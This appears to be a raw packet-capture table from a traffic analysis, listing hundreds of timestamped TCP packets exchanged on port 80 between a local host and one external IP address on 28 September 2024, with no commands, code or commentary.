Sep 28, 2024 07:32:05.555700064 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.555710077 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.555720091 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.555722952 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.555730104 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.555741072 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.555751085 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.555752039 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.555763006 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.555773973 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.555774927 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.555788994 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.555792093 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.555804014 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.555815935 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.555818081 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.555826902 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.555838108 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.555843115 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.555856943 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.555871010 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.555874109 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.555886030 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.555903912 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.555923939 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.556468964 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.556480885 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.556492090 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.556502104 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.556513071 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.556524992 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.556541920 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.556561947 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.594460011 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.594497919 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.594508886 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.594588995 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.594615936 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.594626904 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.594630003 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.594641924 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.594655037 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.594655991 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.594670057 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.594676018 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.594711065 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.594824076 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.594835997 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.594861031 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.594887018 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.594928026 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.594938993 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.594949961 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.594960928 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.594965935 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.594973087 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.594985008 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.595016003 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.595216990 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.595228910 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.595237970 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.595248938 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.595258951 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.595264912 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.595269918 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.595282078 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.595288992 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.595312119 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.595338106 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.595527887 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.595539093 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.595549107 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.595571041 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.595587015 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.595765114 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.595777988 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.595801115 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.595815897 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.595825911 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.595825911 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.595840931 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.595844984 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.595853090 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.595863104 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.595871925 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.595876932 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.595889091 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.595907927 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.595926046 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.596153975 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.596165895 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.596204996 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.596220970 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.598318100 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.598365068 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.598376036 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.598387957 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.598406076 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.598431110 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.598440886 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.598476887 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.598507881 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.598521948 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.598536015 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.598557949 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.598583937 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.598635912 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.598683119 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.640607119 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.640669107 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.640681982 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.640693903 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.640727043 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.640750885 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.640763998 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.640775919 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.640786886 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.640799046 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.640811920 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.640839100 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.640839100 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.640878916 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.640921116 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.640973091 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.640985012 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.641017914 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.641028881 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.641027927 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.641028881 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.641047001 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.641057014 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.641058922 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.641078949 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.641261101 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.641273022 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.641283035 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.641293049 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.641293049 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.641304016 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.641308069 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.641315937 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.641325951 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.641333103 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.641336918 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.641347885 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.641351938 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.641360044 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.641371965 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.641386032 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.641407967 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.641567945 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.641580105 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.641608000 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.641623020 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.641674042 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.641685963 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.641735077 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.641735077 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.641889095 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.641906023 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.641916037 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.641926050 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.641937017 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.641937971 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.641948938 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.641962051 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.641964912 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.641971111 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.641976118 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.641987085 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.641994953 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.641998053 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.642007113 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.642010927 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.642025948 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.642051935 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.642426968 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.642437935 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.642447948 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.642457008 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.642467022 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.642469883 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.642477989 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.642482042 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.642488956 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.642499924 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.642503977 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.642512083 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.642524004 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.642529011 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.642534018 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.642539978 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.642544985 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.642555952 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.642563105 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.642566919 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.642576933 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.642577887 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.642589092 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.642602921 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.642626047 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.642646074 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.642646074 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.642646074 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.643219948 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.643234015 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.643245935 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.643255949 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.643264055 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.643266916 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.643275023 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.643284082 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.643295050 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.643296003 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.643306971 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.643310070 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.643317938 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.643328905 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.643330097 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.643338919 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.643342972 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.643349886 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.643361092 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.643364906 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.643372059 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.643389940 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.643397093 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.643409967 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.643426895 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.643850088 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.643861055 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.643872023 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.643882990 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.643893003 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.643897057 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.643903971 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.643915892 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.643924952 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.643928051 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.643940926 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.643944025 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.643951893 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.643963099 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.643970966 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.644000053 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.682524920 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.682593107 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.682626963 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.682641983 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.682660103 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.682689905 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.682696104 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.682717085 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.682729006 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.682742119 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.682765961 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.682773113 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.682801008 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.682807922 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.682833910 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.682843924 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.682866096 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.682872057 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.682898998 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.682909012 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.682934046 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.682944059 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.682979107 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.683041096 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.683074951 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.683089018 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.683116913 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.683212042 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.683268070 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.683274031 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.683301926 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.683315039 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.683335066 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.683346033 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.683377028 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.683403969 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.683440924 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.683451891 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.683474064 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.683476925 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.683509111 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.683517933 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.683553934 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.683708906 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.683741093 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.683756113 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.683773041 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.683784008 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.683805943 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.683815956 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.683839083 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.683849096 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.683871031 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.683887005 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.683902979 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.683912992 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.683936119 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.683949947 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.683969975 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.683984041 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.684001923 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.684014082 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.684035063 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.684046984 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.684067965 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.684079885 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.684103966 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.684127092 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.684160948 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.686285019 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.686336994 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.686364889 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.686369896 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.686376095 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.686414957 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.686470985 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.686503887 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.686517954 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.686536074 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.686558008 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.686569929 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.686575890 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.686610937 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.728563070 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.728629112 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.728665113 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.728673935 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.728698969 CEST	80	49730	185.215.113.37	192.168.2.4
